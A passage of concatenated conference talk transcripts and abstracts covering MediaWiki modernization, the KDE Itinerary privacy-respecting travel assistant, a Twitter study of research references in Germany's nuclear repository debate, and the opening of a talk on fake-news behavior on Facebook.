before? Is it like extension or is it a completely different project? There is an extension called wiki base that implements this ontological modeling interface for media wiki. That is used to run a website called wiki data which has something like 30 million items modeled that describe the world and serve as a machine readable data back into other wiki projects, other wiki media projects. I used to work on that project for wiki media Germany. I moved on to do different things now for a couple of years. Lukas here in front is probably the person most knowledgeable about the latest and greatest in wiki data development. You shortly talked about test coverage. You talked about test coverage. Yes. I would be interested in if you amped your efforts to help you modernize it and how your current situation is with test coverage. Test coverage for media wiki core is below 50%. In some parts it is below 10% which is very worrying. One thing that we started to look into like half a year ago is instead of writing unit tests for all the code that we actually want to throw away, before we touch it we tried to improve the test coverage using integration tests on the API level. We are currently in the process of writing a suit of tests not just for the API modules but for all the functionality, all the application logic behind the API. That will hopefully cover most of the relevant code paths and give us confidence when we refer to the code. Other questions? You said that you have this legacy system and eventually you have to move away from it. Are there any plans for the near future? At some point you have to cut the current infrastructure to the extensions and so on and it is a hard cut. Are there any plans to build it up from scratch or what are the plans? We are not going to rewrite from scratch. That is a pretty sure fire way to just kill the system. We will have to make some tough decisions about backwards compatibility and probably reconsider some of the requirements and constraints we have with respect to the platforms we run on and also the platforms we serve. One of the things that we have been very careful to do in the past for instance is to make sure that you can do pretty much everything with media, with no JavaScript on the client side. That requirement is likely to drop. You will still be able to read of course without any JavaScript or anything, but the extent of functionality you will have without JavaScript on the client side is likely to be greatly reduced. We will probably end up breaking compatibility to at least some of the user created tools. Hopefully we can offer good alternatives, good APIs, good libraries that people can actually port to that are less brittle. I hope that will motivate people and maybe repay them a bit for the pain of having their tool broken if we can give them something that is more stable, more reliable and hopefully even nicer to use. There are small increments in bits and pieces all over the system. There is no great master plan, no big change to point to really. Okay, further questions? I plan to just sit outside here at the table later if you just want to come and chat. So we can also do that there. Okay, so last call. Are there any other questions? It does not appear so. I would like to ask for huge applause for Daniel for this talk. Thank you.
What does Wikimedia do to modernize WIkipedia's user experience, and why does it take so long? Editing Wikipedia feels like a blast from the past, and even just reading articles feels a bit dusty. Why is that? And how can it be fixed? And how can you help?
10.5446/53244 (DOI)
So hey, we're finally ready to start. We have a full car carousel here with a privacy by design travel assistant. It's going to be about building open source travel assistants, I think. And this talk will be in English. And if you want translations, when you want a German translation, we have a very good translation in our cabin. You can listen to it on c3linguo.org, how they talk live. Get out. Now, let's have a warm welcome for Falka here and have fun with his talk. Thank you. OK, so what is this about? You probably know those features in most prominently Google Mail, but I think Trippit was the one that pioneered this. So Gmail reads your email and then detects any kind of booking information there like your boarding passes, your train tickets, your hotel bookings, and so on. And it can integrate that into your calendar. And it can present your unified itinerary for your entire trip and monitor that for changes. And all of that doesn't cost you anything, maybe a part from a bit of your privacy. Well, not too bad, you might think. But if we look at what kind of data is actually involved in just your travel, right, the obvious things that come to mind, your name, your birthday, your credit card number, your passport number, that kind of information, right? But that isn't even the worst part on this. Because those operators don't just get to see your specific data for one trip, right, they get to see every one's trip. And now if you combine that information, that actually uncovers a lot of information about relations between people, your interests, who you work for, where you live, and all of that, right? So pretty much everyone here traveled to Leipzig for the last four days in a year, right? If that happens for two of us once, right, that might be coincidence. If that happens two or three years in a row, that is some kind of information. But yeah, what to do about that, right? The easy solution is just not use those services. It's like first world luxury stuff anyway. That works until you end up in a foreign country where you don't speak any of the local languages and then get introduced to their counterpart of Schien-Nersatzverkehr or Tarifzone-Randgebiet. And at that point you might be interested in actually understanding what's happening on your trip in some form that you actually understand and that you are familiar with. Ideally without installing 15 different render applications for wherever you actually might be traveling, right? So we need something better. And that obviously leads us to let's do it ourselves. Then we can at least design this for privacy right from the start, build it on top of free software and open data. But of course we need to, at least it's not entirely obvious that this will actually work, right? The Google and Apple, they have a total different amount of resources available for this. So can we actually build this ourselves? So let's have a look at what those services actually need to function. And it turns out it's primarily about data, not so much about code. There's some difficult parts in terms of code involved as well, like the image processing and the PDF to detect the barcode in your boarding pass. But all of that exists as ready-made building blocks. So we basically just need to put this nicely together. So let's look at the data. That's the more interesting part. In general, that breaks down to three different categories. The first one is what I call personal data here. So that's basically booking information, documents or tickets, boarding passes specific for you. So at least you don't have a problem with access because that is sent to you and you need to have access to that. But it comes in all kinds of forms and shapes. There are the challenges to actually extract that. The second kind of data is what I would call static data. So for example, the location of an airport. Now you could argue that that could change and there's rumors that some people apparently managed to build new airports. I live in Berlin so I don't believe this. Jokes aside, so static refers to static within the release cycle of the software, right? So several weeks or a few months. So this is stuff that we can ship as offline databases. And offline, of course, helps us with privacy because then you're not observable from the outside. And the third category is dynamic data. So stuff that is very, very short lived such as delay information. There is no way we can do that offline, right? If we want that kind of information, we will always need some kind of online querying. And let's look through those three categories in a bit more detail. For the booking data, Google was faced with the same problem. So they used their monopoly and defined the standard in which operators should ideally have machine readable annotations on their booking information. And that's awesome because we can just use the same system. That's what nowadays became schema.org, which I think Lukas mentioned in the morning as well. At least in the US and Europe, you find that in about 30 to 50% of booking emails you get from hotels, airlines, or event brokers. So that's a good start. And then there's the rest, which is basically unstructured data, random PDF files, or HTML emails. We have to work with. There's Apple wallet boarding passes. They are somewhat semi-structured and most widespread for flight tickets. Well, that's somewhat usable. And then barcodes. So that's what you, against your own boarding passes or train tickets, I could probably fill an entire talk just with the various details on the different barcode systems. The one for boarding passes, I think, Kaston all had a talk at Congress a few years back where he showed how they work and what you can do with them. Some hashtag boarding pass is a very nice source of test data. The one that you find on German railway tickets is also pretty much researched already. The ones we actually had to break ourselves were the one for Italy. I think, to my knowledge, we are the first ones who publish the content of those binary barcodes. And we are currently working on the faude, faude, KERN, application, e-ticket, which is the standard for German local transportation tickets. That actually has some crypto that you need to get around to actually see the content. So if you're interested in that kind of stuff, there is quite some interesting detail to be found in this. Let's continue with the static data. There, of course, we have Vicky data that has almost everything we need. We are making heavy use of that, and that's also why I'm here today on the Vicky media stage. One thing that Vicky data doesn't do perfectly is time zone information. That's why we are using the OpenStreetMap data for this. There's in Vicky data three different ways of specifying the time zone, UTC offsets, some kind of course human readable naming like central European summertime, and then the actual IANA time zone specifications like Europe slash Berlin. And that's the one we actually need because they contain daylight saving time transitions. And that is actually crucial for travel assistance because you can have a flight from, say, the US to Europe at the night where there is daylight saving time transition on one end. And if we get that wrong, right, we are off by one hour, and that could mean you miss your flight. So that we need to get absolutely right. And Vicky data there mixes the three time zone variations. That's why we fall back to OpenStreetMap there. Another area that still needs work is vendor specific station identifiers. So there's a number of train companies that have their own numeric identifier or alphanumeric identifiers, which you find, for example, in barcodes of tickets. So that's our way to actually find out where people are traveling. So that's something we are trying to feed into Vicky data as we get our hands on those identifiers. For airports, that's easy because they are internationally standardized. For train stations, that's a bit more messy. And finally, the dynamic data. That's again an area where we benefit from Google using their monopoly. They wanted to have local public transportation information in Google Maps. So they defined the GTFS format, which is a way for local transport operators to send their schedules to Google. But most of the time that is done in a way that they basically publish this as open data. And that way, all of us get access to it. And then there's Navizia, which is a free software implementation of a routing and journey query service that consumes all of those open data schedule information. And that then, in turn, we can use again to find out departure schedules, delays, and that kind of life information. Apple Volid also has some kind of life updating polling mechanism. But that is somewhat dangerous because it leaks personal identifiable information. So basically, a unique identifier for your pass is sent out with the API request to poll an update. So that is basically just a last resort mechanism if you have nothing else. And then there's a bunch of vendor-specific, more or less proprietary APIs that we could use. They are unfortunately not often compatible with free software and open source. They might require API keys that you're not allowed to share, or they have time and conditions that are simply incompatible with what we are trying to do. For some this works, but there's still some room for improvement in those vendors understanding the value of proper open data access. OK, so that's the theory. Let's have a look at what we have actually built for this. So there's two backend components, so to say. There's the extraction library that implements the schema.org data model for flights, for trains, for hotels, for restaurants, and for events. It can do the structured data extraction that might sound easy at first, but it turns out that for some of the operators, doing proper JSON array encoding is somewhat hard. So I mean, you need to have a comma in between two objects and break it around it. Some of them struggle with that. So we have to have lots of workarounds in parsing the data we receive. Then we have an unstructured extraction system that's basically small scripts per provider or per operator that then use regular expressions or XPath queries depending on the input and turn that into our data model. We currently, I think, have slightly more than 50 of those. I know that Apple has about 600, so that is still one all of magnitude more, but it's not impossible, right? So I think we have the means there with free software to come to a similar result than people that have an Apple or Google scale budget for this. The service coverage is actually quite different. So for Apple, I've seen their customer extractors, so they have a lot of US car rental services. We have somewhat more important stuff like CCC tickets, so the Congress ticket is actually recognized and I managed to get in with the app. What the Expaction Engine also does is it augments whatever we find in the input documents by information we have from Vicky Data. So we usually have time zones, countries, geo coordinates, all that useful stuff for then offering assistance features on top. Input formats is basically everything I mentioned. The usual stuff you get in an email from a transport operator or any kind of booking document. The second piece on backend components is the public transportation library. That's basically a client API for Navizia mainly, but also for some of the proprietary widespread backends like Hafa's, that's the stuff Deutsche Bahn is using. It can aggregate the results from multiple backends. If you're using open data in a backend, it propagates the attribution information correctly. And just a few days ago, it also gained support for querying train and platform layouts, so Wagenstandsansage in German, so we can have all of that in the app. And then of course there's the KDI Chinnarei app itself. So it has a, it's very hard to read here. It's basically a timeline with the various booking information you have grouped together by trip. It can insert the live weather information. Again, that's online access, so it's optional, but it's kind of useful. And this is, you probably can't read that, but that's my train to Leipzig this morning, and that's actually the Congress entry ticket. And the box at the top is the collapsible group for my trip to Leipzig for Congress. And it can show the actual tickets and barcodes, including app-volid passes. So if you sometimes have a manual inspection at an airport where they don't scan your barb, boarding pass, but look at it, apparently that looks reasonably enough that you can board an aircraft visit. At least I wasn't arrested so far. And then we have one of my favorite features, also powered by VikiData. It's the power plug incompatibility warning. So I mean, if you're traveling to, say, the US or UK, you're probably aware that they have incompatible power plugs. But there's some countries where this isn't, at least to me, isn't that obvious, like Switzerland or Italy, where only half of my power plugs work. So this is the Italy example. It tells me that my Schuylko plugs won't work, only my Euro plugs. And the right one is, I think, for the UK, where nothing is compatible. If you occasionally forget your power plug converter while traveling, that is super useful. And then, of course, we have the integration with real-time data. So we can show the delay information and platform changes. The part in the middle is the alternative connection selection for trains. So if you have a train ticket that isn't bound to a specific connection, then the app lets you pick the one you actually want to take. Or if you're missing a connection, you need to move to a different train. You can do that right in the app as well. The screenshot on the right-hand side is your overall travel statistics. So if you're interested in seeing the carbon impact of all your trips and the year-over-year changes, the app shows that to you. And I wasn't really successful, but that's largely because the old data isn't complete. So if you're interested in that, since we have all the data, that can help you see if you're actually on the right track there. And then to get data into that, we also have a plugin for email clients. This one is for K-Mail. So it basically then runs the extraction on the email you're currently looking at. And it shows you a summary of what's in there. In this case, my train to Leipzig this morning, including the option to add that to the calendar or send it to the app on the phone. We also have the browser extension. So this is the website of the UDKDE conference, which has the schema.org annotations on it. And the browser extension recognizes that and again, offers me to add that either to my calendar or to the itinerary app. And that also works on many restaurant websites or event websites. They have those annotations on the website for the Google search. So again, we benefit a bit from the Google. Okay, then we get to the more experimental stuff that basically just was finished in the last couple of days that we haven't shown anywhere else publicly yet. The first one is, and that's a bit better to read at least, if you saw the timeline earlier, right, it had my train booking to Leipzig and then the Congress ticket. But that still leaves two gaps, right? I need to get from home to the station in Berlin and I need to get from the station in Leipzig to Congress. And what we have now is a way for the app to automatically recognize those gaps and fill them with suggestions on what kind of local transport you could take. So here the one for Leipzig to Congress is expanded and shows the tram. That still needs some work to do live tracking so that it accounts for delays and changes your alarm clock in the morning if there's delays on that trip. But we have all the building blocks to make the whole thing much more smart in this area now. And that I think was literally done yesterday. So that's why the graphics still are very basic. It's the train layout, coach layout display for your trip so that you know where your reserved seat on the train can actually be found. Then I only showed the K-Mail plug-in so far. We also have a work in progress Thunderbird integration, which is probably the much more widespread email client. Feature wise more or less the same I showed for K-Mail. So it scans the email and displays your summary and offers you to put that into the app or possibly later on also into the calendar. This one is even more experimental. I can only show you a screenshot of Weapon Spectre approving that it managed to extract something. That's the integration with NextCloud. I hope we'll have an actual working prototype for this in January then. Those two things are of course important for you to even get to the data, the booking data that then the app or other tools you build on top can consume. So where to get this from? There's the wiki link up there. The app is currently not yet in the Play Store or in the FTOID Master repository. We have an FTOID Nightly Built repository. I hope that within the next month we'll get actual official releases in the easier to reach stores than what we have right now. If you're interested in helping with that, there's some stuff in wiki data where improvement on the data directly benefits this work and that is specifically around train stations. I think in Germany last time I checked we still had a few hundred train stations that didn't have geo coordinates or even a human readable label. So that is something to look at. vendor specific or even the more or less standard train station identifiers is something to look at. So UIC or IDNR codes for train stations that helps a lot. Then we kind of need test data for the extractions or forget everything I said about privacy. If you have any kind of booking documents or emails you want to donate to support this and get the providers you're using supported in the extraction engine talk to me, that would be extremely useful. Yeah, that's it. Thank you. Hello. Hello. Yeah. That's a very impressive project. I think do we have questions then I'll hand you my microphone. Yes. Would it be possible to extract platform lift data for train stations? Sorry, platform? Platform lift data. I think Deutsche Bahn has an open data API for the life status of lifts. That would of course in theory be possible. What we are trying to do is to be generic enough so that this might not be applicable in just one country. It is very European focus because most of the team is there, but lift is something that is easy enough to generalize in a data model. It's location on the platform and are they working or not. That would be a nice addition. That goes into the entire direction of indoor navigation or navigation around larger train stations and airports. That's probably something where we could use a better overall display with the open street map data and then augment that with where exactly is your train stopping and in which coaches you see it and then have to lift data so we can basically guide you to the right place in a better way. Any more questions? Yes. Is the mobile app written in QT as well? Yes. Most of this is C++ code because that's what we use at KDE. The mobile client as well. There is a bit of Java for platform integration with Android. I don't think anyone has ever tried to build it on iOS, but of course it works on Linux based mobile platforms as well. Thanks to QT and C++. You mostly talked about the mobile app so far, which is understandable, but as it's a QML application, does it also run on desktop? Second question, how do all the plug-ins and the different instances of the app share the data? Yes, the app runs on desktop. I was trying to see if I can actually start it here. I'm not sure on which screen it will end up. That's where we do most of the development. Let me see if I can move it over. Thank you. Now I need to find my mouse cursor on the two screens. I think I need to end the presentation first. But yeah, short answer, of course. There we go. Let me switch to... Yep, so that's it running on desktop. It has a mobile UI there. That could of course be extended to be more useful on the desktop as well. And in terms of storage, that is currently internal to the app. There's no second process accessing the actual data storage. That would just unnecessarily complicate it for now, but if there is a use for that, yeah, we'll need to see. But there was an option in the email plug-ins, for example, to send it to the app. Can I then only send it to my local app and not to the mobile app? We send to app that's using KD Connect. That's an integration software that allows you to remote control your phone from the desktop. So that's basically bundling up all the information and sends it to the app on the phone. Or it can import it locally. Okay, do we have other questions? Again, now we don't have time. So then, thank you very much, Falka. Maybe you can tell people where they can find you if they have anything more they want to talk about. Yeah, I mean, there's my email address, and otherwise I'll be around all four days. Around where? Everyone? Okay. So just catch them before you run away then. Okay, so give a round of applause again, and thank you, Falka. Thank you.
Getting your itinerary presented in a unified, well structured and always up to date fashion rather than as advertisement overloaded HTML emails or via countless vendor apps has become a standard feature of digital assistants such as the Google platform. While very useful and convenient, it comes at a heavy privacy cost. Besides sensitive information such as passport or credit card numbers, the correlation of travel data from a large pool of users exposes a lot about people's work, interests and relationships. Just not using such services is one way to escape this, or we build a privacy-respecting alternative ourselves! Standing on the shoulders of KDE, Wikidata, Navitia, OpenStreetMap and a few other FOSS communities we have been exploring what it would take to to build a free and privacy-respecting travel assistant during the past two years, resulting in a number of building blocks and the "KDE Itinerary" application. In this talk we will look at what has been built, and how, and what can be done with this now. In particular we will review the different types of data digital travel assistants rely on, where we can get those from, and at what impact for your privacy. The most obvious data source are your personal booking information. Extracting data from reservation documents is possible from a number of different input formats, such as emails, PDF files or Apple Wallet passes, considering structured annotations and barcodes, but also by using vendor-specific extractors for unstructured data. All of this is done locally on your own devices, without any online access. Reservation data is then augmented from open data sources such as Wikidata and OpenStreetMap to fill in often missing but crucial information such as timezones or geo coordinates of departure and arrival locations. And finally we need realtime traffic data as well, such as provided by Navitia as Open Data for ground-based transport. Should the author fail to show up to this presentation it might be that his Deutsche Bahn ticket rendering code still needs a few bugfixes ;-)
10.5446/52960 (DOI)
Yeah, so welcome also from my side to this presentation. And as was just announced, I will now present to you some selected results from a case study we did on the Twitter communication surrounding the topic of search for a nuclear repository in Germany. And a particular focus of ours was on the question whether the conversation participants would share research in these conversations. Yeah, I guess most easily described is our motivation by briefly introducing the two projects behind this case study, because this was a cooperation of two projects. The first of those is called Transens. That's a joint project of 16 German and Swiss institutes with the main goal of understanding interdependencies between science and society related to this topic of nuclear waste disposal. A reason for this interest is that in Germany, the legislation emphasizes that this process should be transparent, participatory, and science-based. So from Transens perspective, this case study could be an opportunity to see whether we can find evidence for this being the case in the Twitter communication about this case. The second project involved in this case study is called MediCo. That's the one that I'm also working in. And MediCo has a background in cytometrics. There, the main question is how can we describe and quantify the relationships between promotions that science publications receive in external science communication and the later impact, as it's typically measured in indicators, as for example, citation counts. And from MediCo's perspective, this case study might be an opportunity to better understand the role that academic research plays in conversations on social media around the topic that also received considerable media attention around its time. These project backgrounds can roughly be translated to two main objectives for our case study. The first would be to just get an overview of the conversations around this topic of German nuclear repository search on Twitter, especially who are the most active and vocal participants leading these conversations. Our second objective would be to see whether participants actively reference research in these conversations. And if so, how? Now, I'm talking about previous research on social media's role in scholarly and science communication. There, of course, also is a lot. See, for example, Tsuke Motu et al. for a quite recent review of such studies. Although quite a lot of those studies have been focusing on academic users and scientists, for example, typically answering questions like which platforms are used by academics in context of their work and to which needs are fulfilled by specific platforms in this context of scholarly and science communication. Also, there have been studies addressing this question on who is it that interacts with scientific publications on online platforms. Although probably all two of this prevalent focus on academic users, still comparatively little is known about the level to which the general public actively references and distributes academic research in their conversations on social media, for example, to strengthen their own arguments or their own claims. And whether this is a case is particularly interesting for ad metrics research. Because ad metrics quite often come with this hope that they might be better at capturing societal influence of research than, for example, traditional bibliometric indicators like citation counts, which would primarily capture academic influence. I assume that most of you will be familiar with the term ad metrics. Maybe it's a very, very brief definition. Ad metrics are this concept of measuring the influence of research products online by measuring the interaction with them in online platforms, like, for example, social media, but also blogs or online news portals and so on. Some more specific previous studies that are relevant for our work because they go in a similar direction that we also intended to go are shown here. So one thing that several past studies insinuate is that it's probably mostly academics who reference research on Twitter. You see a list of case studies here who insinuate that this might be the case. Furthermore, some previous studies suggest that second order citations might play a big role when asking yourself how is research reference on Twitter. For example, Priem and Costello found for a sample of researchers that about half of the times that these researchers would reference research on Twitter, they would do so by linking to intermediate web pages, which would then themselves link to scientific publications instead of linking directly to those scientific publications. OK, so much regarding previous research onto our own approach. As a short reminder, what we intended to do is characterize these conversations around the German nuclear repository search on Twitter and investigate the role of research within these conversations. So first, of course, we had to collect tweets and we did so using tags. Tags is a Google-specary based script that are based on lists of keywords, fetches, all tweets that contain at least one of those keywords, more on all lists of keywords on the next slide. And we ran data collection for about 12 weeks surrounding the 28th of September of the last year because that was a date that potential sites for the final repository were announced. And after we had collected tweets, the next steps would be to describe them statistically, to code the most active participants in our data set, and to both automatically and manually search for references to research in this data. And these are the steps that the rest of the presentation will be about. In this table, you see summarized the keywords in the left column, the German keywords, that we searched for to collect tweets. And on the right side in the right column, the numbers of tweets retrieved this way. So initially, we collected for these 12 weeks of observation about 14,000 tweets, removing duplicates, but reduces to 10,884 tweets. And if we don't consider retweets, which in many cases would just be duplicates of another form of existing tweets in our data set, we would be left with 3,677 unique original tweets for our content analysis. Including retweets, 5,616 users were involved in these tracked conversations and only considering unique tweets, 1,808 users participated in this. Now, of course, one of the first things we looked at is the distribution of tweets over users. And there we found a pattern that was to be expected, because this is quite common for this type of social media data that very few, very active users contributed, very large shares of our data set, and most users only contributed exactly one tweet. As I said, this was to be expected, but still needs to be reported, I think. Onto the more interesting part of the user analysis, which was the manual coding. So our objective here, as mentioned earlier, was to identify who are the most active users in this conversation, who determine the conversation. And to get an idea for this, we manually examined the Twitter profiles of the 50 most active users, which were together responsible for about a third of all original tweets in our sample. And specifically, we looked for three properties. First, whether they would belong to individuals or groups. Second, what their primary profession or role might be. And third, whether there would be evidence for the user having an academic background. An example for how this coding would proceed, I will show you next. So here you see one random user account from our sample on the left. And the table of categories that we came up with during the coding on the right. You will surely ask yourselves how we arrived at these exact categories. And of course, the paper describes these in detail and also the process that led to them in detail here for the sake of time. Just let me tell you that we use an inductive approach here. So we didn't assume the existence of any categories from the beginning, but created these during coding and then would revise previous codings accordingly if new categories would be added to the list. Now, in this example, we would, for example, code this account as likely belonging to an individual as it shows one real name of a probably real existing person. I just blurred the last name here because it's not important for this, but the real account has a full name. Then we would have categorized this account as belonging to the category Activism Initiative regarding its role. Because at the center of this account, there are some clearly formulated societal or political goals that this account probably strives towards. And in this case, we would have no evidence for academic background. So quite frequently, if the examination of this Twitter biography wouldn't lead to clear results, we would also do complementary Google searches. So it's happened especially often with institutions to be able to characterize those properly. OK, enough of this example. The results of the coding for the 50 most active users is what you see in this table, which is, of course, quite a lot of data at once, which is why I'll point you to what some of the most interesting observations. So one thing that's obviously interesting to examine is which role category did provide most tweets. And this, in our case, would be the group categorizes Activism Slash Initiative, which were most active regarding their tweet volume. Another thing that's obviously of interest for us to know is which would be the category of users that would likely reach the largest audience. And when looking at the aggregated number of followers of the individual categories, we see that journalism in this regard by far leads the field. One should note here that also this journalism group is, again, characterized by some very strong outliers to the top. Because at Target Show, at site online, and at Target Spiegel were the top three, for example, in our sample regarding follower numbers. And both of three alone would account for about 5.4 million of these followers. Yeah, and as you probably remember, we have particular interest in examining the role of research and scientists in these conversations. And going from this user analysis, we can see that research institutes and researchers seem to play a comparatively minor role. There were 12% of accounts that were categorized as belonging to this group of science engineering. But both regarding the number of tweets, as well as the number of likely-reached followers, this would be far behind activists and journalists. OK, so much as a look on our user analysis onto the reference analysis. Here, our main question was do conversations, participants, reference research in their tweets. And we did this basically in two steps. The first step was a naive one, where we just automatically searched the whole data set for the string DOI and for the regular expression for DOIs, just to see if this might already provide us with a significant amount of references to research articles. But it didn't. We only received one link to a journal article from the whole data set this way. So we definitely had to go into more detail. And we did that by first extracting all treats that contained at least one outgoing link. And then taking a random sample of those tweets and categorizing all links by visiting the resources behind them manually and categorizing the type of resource that the tweet would link to. The results of this link coding for our random sample of 250 tweets is shown in this table. And again, I'll walk you through some of the most interesting observations bit by bit. So our first question, as I repeated sometimes already, I think, was whether users would link to scientific research in the tweets. And now the automatic search previously had suggested that this happens extremely rarely. And the manual search would mainly confirm this. We found exactly one additional link to a scientific publication in this random sample. If we take a more generous definition of what constitutes scientific publication, one could also count this one link to educational content as another reference of that kind. That was a reference to teaching material for geography teachers, by the way. So still, direct links to research seem to be extremely scarce. But what we did find going through all those other categories is a surprisingly large amount of links that could be counted as these second order citations I mentioned earlier. Links towards paraphrasing or summarizing materials that then themselves would link towards research results or clearly reference research results. The category where it was most easily seen that this could constitute second order citations would be what we call paraphrase studies slash reports. So a link to a textographic that has the main purpose of summarizing previous academic publications. The typical example for this would be a scholarly block. An example from our sample is this tweet that contains, you don't have to read these tweets, by the way, or try to read them. I summarize the important information. This contains a link to a scholarly block. And once you are on the scholarly block, it's fairly easy to see the scholarly block is summarizing research results. In another category, where this second order citation relationship was fairly easy to determine would be what we call popular science. What we mean by this are texts, videos, or graphics that have the main purpose of making some complex academic topic accessible. An example would be this tweet that contained a link to a video that would summarize the most important facts about the repository in Mausley in 90 seconds. And these two categories alone, as you can see, already constituted for 36 occurrences in our data set. But even in categories where it's less obvious that this is a second order citation, we did find interesting occurrences. For example, in the most prevalent of all categories that we coded, links to news articles or journalism. And there, of course, we could also find some cases of second order citations, like this tweet that references a news article on baer.de. And that news article on baer.de would then, as it already says in the title, be on a newly published study. In this case, this was a study that was published around the time of data collection in nature energy. And to this particular study alone, we found seven links of this type in our randomly coded sample. OK, I think it's time is running short a bit. I will go quite quickly over the last example, which is tweet embeddings would be another way for such a second order citation as this example shows. So let me summarize some things we saw when characterizing this Twitter conversation around our use case with this question in mind where the conversations would link to research. First, we found the conversation to be dominated by relatively few very active accounts, which, as I said, was to be expected. What was less expected is that activity-wise, activism accounts or initiatives were, by far, the most active accounts, while journalism accounts were the most influential accounts follower-wise in our sample. Research institutes and researchers, on the other hand, seem to play a comparatively minor active role. Both automatic and manual searches for research mentions suggest that direct links to publications are very rare, is what we've seen, but, on the other hand, a surprisingly high amount of these second order citations were found. For example, a link to a news article which would then report on a scientific study, which would be used to infuse these results of this scientific study into the Twitter communication by linking to the news article that reports on it. To conclude, one intention of our study, as I mentioned in the beginning, was to get an impression on the suitability of Twitter as a platform to see whether this selection process behind the German repository search happens in a participatory and science-based way. Regarding this, I think the data goes in both ways, actually. First, the diversity of represented roles that we saw in our sample, and especially the high degree of initiatives and activists, I think suggests that at least this conversation did not take place in a closed ivory tower of academics and technocrats, but did involve committed citizens in substantial level. Also, we found these surprisingly many second order citations to process research results, these links, despite on the first look, little amount of direct references to research articles. On the other hand, we did not see much of an exchange around scientific findings. What I mean by that mainly is that most of those references we found went to very few in the same studies again and again. And last slide. I think this has interesting applications for metrics, because what this clearly demonstrates is that in our case, if we would have measured the influence of research articles by counting links to, for example, the journal article landing pages, or even by counting the occurrences of their persistent identifiers like the UIs, we would have greatly underestimated the true visibility that some articles had in these conversations, which we only saw because we resolved and processed the contents behind the links and the treats. And as especially, news articles seem to be such a popular way of introducing scientific findings and thoughts into Twitter conversations by linking to the news articles. For me, this raises the question whether news mentions might actually be better as an altmetric indicator at capturing what tweet mentions are often supposed to capture. It's mainly a question for the altmetrics crowd. And to close the talk, a brief outlook and mention of some limitations that might be less obvious. So what remains to be done is to extend this coding definitely to larger samples. As often with qualitative coding, this, of course, takes time. Another interesting addition, I think, to these examinations would be network analysis of the conversation participants. And one limitation that also has to be mentioned that might not be clear is that previous research has shown that this debate on nuclear energy varies greatly from country to country. And example for this is that in the US, for example, nuclear energy is quite frequently considered to be a very green, sustainable form of energy. Ah, yeah, last sentence. And I think for most Germans, this might be different. This is the view of most Germans. So the findings of the study presumably cannot be transferred to the discourse in other countries. Thank you very much. And I'd be happy for any comments or questions in English or, of course, German, too.
exchanges of research findings however appear to have happened rarely and been limited to very few particular studies. The findings also illustrate a central problem regarding the expressive power of social media-based altmetrics, namely that a large share of signals indicating a scholarly work’s influence will not be found by searching for explicit identifiers.""The search for a final nuclear repository in Germany poses a societal and political issue of high national medial presence and controversy. The German Repository Site Selection Act demands the search to be a “participatory, science-based […] process”. Also, the repository search combines numerous scientific aspects (e.g., geological analyses, technical requirements) with broad societal implications. For these reasons it constitutes a promising background to analyze the general public’s habits regarding referencing research on Twitter. We collected tweets associated with the conversation around the German nuclear repository search based on keywords. Subsamples of the resulting tweet set are coded regarding sending users’ professional roles and types of hyperlinked content. We found the most vocal group participating in the conversation to be activists and initiatives, while journalists constituted the follower-wise most influential accounts in the sample. Regarding references to scientific content, we found only very few cases of direct links to scholarly publications
10.5446/52967 (DOI)
Thank you. I hope everyone has seen my slides. Again, my name is Thomas Schmidt from the media informatics group of the University of Regensburg and I will report on a project for a paper called information behavior towards false information and fake news on Facebook, the influence of gender, user type and trust in social media. The origins of this project are situated in a seminar course. I've studied in information science by David Elzweiler, so you can say it's some sort of collaborative project between information science and media informatics here in Regensburg, who authors are Elizabeth Salomon, David Elzweiler and my supervisor, Christian Wolf. So without further ado, I will go into the introduction. As early as 2014, false information and fake news on social media has been considered a hot topic. The World Economic Forum called it one of the top 10 trends of 2014. As you can see, the rapid spread of misinformation online and in my personal impression, I would say with the recent American presidency, it became a dominant topic in media and especially nowadays with the COVID pandemic, it's an even more dominant topic in everyday society. And some examples, these are just some articles I found recently in the New York Times talking about the problem of fake news in the context of older adults. Another example from a German outlet speaking, talking about the problems of fake news in the context of the Corona pandemic. So this is a big topic that is talked about in society and in general. And of course, it is also a very important topic. It's also data detention from the scientific community. You will find a lot of theoretical work and trying to build taxonomies and what are misinformation, what are disinformation and stuff like this. In a famous science publication, the researchers were looking at how rumors and false information are spread on social media. If you have visited any sort of tax mining conference or NLP conference, you will always find some tracks nowadays dealing with the automatic prediction or analysis of fake news and social media, workshops on fact extraction and verification as you can find here. So this is a big topic. And of course, information science is also dealing with this topic. Specifically in the realm of information behavior, researchers look at how people interact and share false information, how they perceive false information and other factors. One particular research area that we are also situated in is the analysis of individual personal related factors in the consumption and interaction with false information on social media. So are there some personal related factors that change the way to interact with false information? This is of course, an interesting topic if you want to holistically really understand false information behavior itself. As early as 2009, researchers were looking at factors like the user type, so how active someone is on a specific social media outlet, how intrinsic and extrinsic motivation influences the behavior and other factors that are looked at. Some classics in individual individual factors and information behavior, gender, personality. And of course, we also talked at this conference a lot about information literacy and as you can assume this is also a factor that you might imagine has some influence on the way to interact with false information online. Most of the studies are of course, either internationally or America focused. We personally did conduct a study that is purely focused on Germany and the interaction with false information from Germans on social media. So if you want to conduct a study specifically for Germany to analyze some of these factors, you have to talk about Facebook as biggest social media outlet. It's still the most popular social media outlet in Germany. Twitter has gained some popularity with the recent American presidency and dominance in media, but it's still just a niche, so to speak, in the general public. So we focused our analysis on Facebook and on information behavior on Facebook. And to explore this topic in a first pilot study, we decided to perform a questionnaire study, a survey study, and we deemed this fitting to find first quantitative results that might lead us into novel directions to access this topic. What are the variables that we are interested in? Again, our focus actually lied on these person related factors. So we were interested in gender in the biological sense just because it's such a big topic in individual factors on information behavior, but also on this factor, Facebook usage and user type. So how actively are you using social media? Does this influence in any shape or form? How you interact with false information? A more abstract factor that we also deemed interesting was trust in social media. It seems like an educated guess that the more you trust social media, the more you might change your behavior towards interaction with false information. These are the three factors we focused our analysis on. And what are we meaning when we talk about false information behavior? I will outline this specific question we used to measure this variables later on, but on a more global level, we are interested how people handle false information. So how do they think to consume false information? How do they think to share false information and so on? From an information literacy perspective, how do they verify information if they team it false? And how do they actively react to false information? So do they report false information? Do they like common false information? And so on. Yes, I will talk about the variables in more detail in the upcoming slides. Again, this is a questionnaire based study. The question is rather long and also a bit complex, I would say, scales are switching every now and then. It consists of 42 items and you can think about the questioner as some list of items that are clustered to summarize some of the variables aforementioned. So you have a list of items that deal to measure and operationalize a Facebook intensity usage and another cluster to measure verification of false information. And I will look at this item in specific in the upcoming slides. Since the test, since the questioner was rather complex, we conducted various pre-tests with small sample sizes, which were quite important to guarantee the understanding of the questionnaire. And we acquired participants via general Facebook groups on Facebook. So participants had to be Facebook users in some sort. They had to be from Germany and 